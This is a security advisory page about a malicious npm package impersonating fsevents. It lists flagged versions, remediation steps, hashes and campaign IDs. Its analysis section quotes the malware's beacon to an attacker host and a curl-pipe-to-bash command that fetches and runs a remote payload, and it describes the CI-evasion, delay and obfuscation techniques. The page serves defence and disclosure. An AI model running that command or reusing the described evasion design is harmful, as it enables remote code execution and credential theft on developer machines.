Which versions of @403name/fsevent are malicious?

The following npm versions of @403name/fsevent are flagged malicious: 1.0.0, 1.0.1. Treat any of these as compromised.

How do I remediate @403name/fsevent if I installed it?

Remove @403name/fsevent from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is @403name/fsevent part of a known attack campaign?

Yes — @403name/fsevent is associated with the IN-MAL-2026-005448, IN-MAL-2026-005451 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect @403name/fsevent in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking @403name/fsevent and packages like it before any post-install script runs.

Malicious package

@403name/fseventnpm

Malicious code in @403name/fsevent (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5549

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall @403name/fsevent

What this malware does

On require(), index.js runs an IIFE that gates to macOS, skips when CI or GITHUB_ACTIONS is set, waits 30-90 seconds, and writes a one-shot marker at ~/.cache/.nyx-npm/f. It then spawns /bin/sh to (1) GET https://k7xm9q.xyz/api/clickfix-callback with URL-encoded query parameters bid, user (process.env.USER), host (os.hostname()), and the literal tag npm_fsevent — a beacon identifying the infected machine — and (2) execute curl -sSfL https://k7xm9q.xyz/api/payload/ | /bin/bash & disown, fetching and shell-executing attacker-controlled code with the developer's privileges. The C2 host is hidden behind atob('aHR0cHM6Ly9rN3htOXEueHl6') to evade keyword scanning. The package name @403name/fsevent and its description ("Native filesystem event watcher for Node.js — lightweight FSEvents wrapper with fallback polling") impersonate the well-known fsevents package to lure developers into installing and importing it. The combination of obfuscated C2, CI evasion, randomized delay, one-shot persistence marker, host-identifier exfiltration, and pipe-to-bash remote execution is unambiguous malicious tradecraft.

Malicious versions

2 flagged

1.0.01.0.1

Indicators of compromise (SHA-256)

2f86ca4502cc824c3684e8f1e08b088b974b4339829461b50d45e3fbc6f808eb

a29e56279c83c00ea2d5d9347dc9741954a596deefd3319185d318593a5c7239

Frequently asked questions

No. @403name/fsevent on npm has been identified as a malicious package (versions 1.0.0, 1.0.1 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005448IN-MAL-2026-005451

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection